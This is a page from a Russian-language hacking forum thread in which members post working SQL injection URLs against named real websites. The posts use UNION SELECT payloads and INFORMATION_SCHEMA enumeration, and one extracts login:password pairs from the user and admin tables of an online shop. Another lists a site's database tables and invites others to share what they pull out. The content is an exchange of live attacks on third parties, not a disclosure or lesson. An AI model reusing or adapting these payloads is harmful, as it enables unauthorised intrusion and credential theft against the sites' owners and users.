HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #271  
Старый 17.01.2007, 20:41
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Код:
http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,convert(version()+using+latin1)/*
___
 
Ответить с цитированием

  #272  
Старый 18.01.2007, 00:27
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

http://expoelectroseti.ru/index.php?id=-1+union+select+1,2,3,4,5,6,table_name,8+from+INFOR MATION_SCHEMA.TABLES+limit+0,1/*&lng=ru
 
Ответить с цитированием

  #273  
Старый 18.01.2007, 00:37
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

http://www.paromy.ru/main.php?l1=3&l3=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
при попытке извлеч данные из таблицы, перекидывает на страницу хоста =(
 
Ответить с цитированием

  #274  
Старый 18.01.2007, 08:28
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Код HTML:
http://lineage.te.ua/kb.php?npc_id=25259999%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38/*
 
Ответить с цитированием

  #275  
Старый 18.01.2007, 11:29
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Код:
http://ultrabyte.ru/viewvac.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
 
Ответить с цитированием

  #276  
Старый 18.01.2007, 11:44
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Код:
http://02.ru/news/index.php?id_tn=5&id_n=-99+union+select+1,2,3,4,5,6,7/*
Код:
http://job.02.ru/sql.php?type=fvac&id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Вообщем весь "портал" бажный =\
 
Ответить с цитированием

  #277  
Старый 18.01.2007, 16:30
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Хостинг UkrNic
http://www.ukrnic.com/hosting_info.php?id=-1+union+select+1,VERSION(),USER()/*
Инет магазин www.PRESSA.net
Обычные юзвери
Цитата:
http://www.pressa.net/about/service.php?id=-1+union+select+1,null,3,4,5,6,7,concat(login,char( 58),password)+from+user/*
С привелегиями
Цитата:
http://www.pressa.net/about/service.php?id=-1+union+select+1,null,3,4,5,6,7,concat(login,char( 58),password)+from+adin_user/*

Последний раз редактировалось kot777; 19.01.2007 в 00:14..
 
Ответить с цитированием

  #278  
Старый 20.01.2007, 04:07
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

сел седня изучать скл-инж, вроде начало получаться, но в итоге логинов/паролей не получил, а так нарыл следующее, может и фигня, хз :

Код:
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('ForumMessages','DelficsClassPhotoPoints','ForumForums','DelficsClassPhoto','Banners','Articles','ForumSections','NewsVendors','ATI_Sections','ManagerShopPollOtherSources','NewsDelfics','ATI_MBChipset','ProductsTypes','dtproperties','ForumSubscribers','ManagerShopLogins','LinksFamajor','ManagerShopPollSources','ManagerShopPollDay','ManagerShopPollSums','GbSections','NewsBigmir','NewsCompany','MHShops','NewsGB','NewsHifiSections','NewsShop','NewsHifi','ProductsAction','ProductsArticles','ManagerShopPollCustomer','ProductsComputersAction','ProductsDrivers','ProductsCertificatesAccordance','ProductsParameters','ProductsMain','ProductsParametersAccordanceTypes','ProductsParametersVariantValues','ProductsSections','ProductsParametersValues','ProductsTerms','ProductsValues','RacingCardsView','SearchQueries','ShopCustomers','ServiceCenters','ShopCustomersCities','RacingBingo','Racings','ShopCustomersRegions','ShopDeliveryNightExpress','ShopDeliveryVariants','ShopOrders','ShopOrdersComments','ShopOrdersItems','StormTypes','ProductsCertificates','ShopOrderStatuses','ShopProductsOnMain','ShopSessions','ShopPaymentVariants','sysconstraints','Vendors','StormProducts','VotesQuestions','VotesAnswers','syssegments','ShopDeliveryPlaces','RacingCards','VendorsStatuses','ProductsTypesDiscont','MHSaturday','ProductsLinks'))--
и детальные на некоторые
Код:
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='GbSections'+AND+COLUMN_NAME+NOT+IN+('sectionID','sectionurl','sortorder','parentid','sectioncontent','sectionname'))--
Код:
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='dtproperties'+AND+COLUMN_NAME+NOT+IN+('id','objectid','property','value','uvalue','lvalue','version'))--

Код:
http://www.delfics.com/del_news.asp?NewsID=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='Articles'+AND+COLUMN_NAME+NOT+IN+('Article_id','Article_Name','File_name','Type_id','Views','ArticleType_id','Vendor_Id','add_date','ProductsSection_Id'))--
если кто-то что-то интересное вытянет, напишите в приват, а то мне учиться надо
 
Ответить с цитированием

  #279  
Старый 20.01.2007, 23:26
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Код:
_http://www.searchmonster.org/index.php?lw=16903+union+select+1,2,3,4,5+from+wsr/*
на столбцы не хватило нервов))
 
Ответить с цитированием

  #280  
Старый 21.01.2007, 00:12
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

http://www.gelezo.net/files.php?id=20031030191145'
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ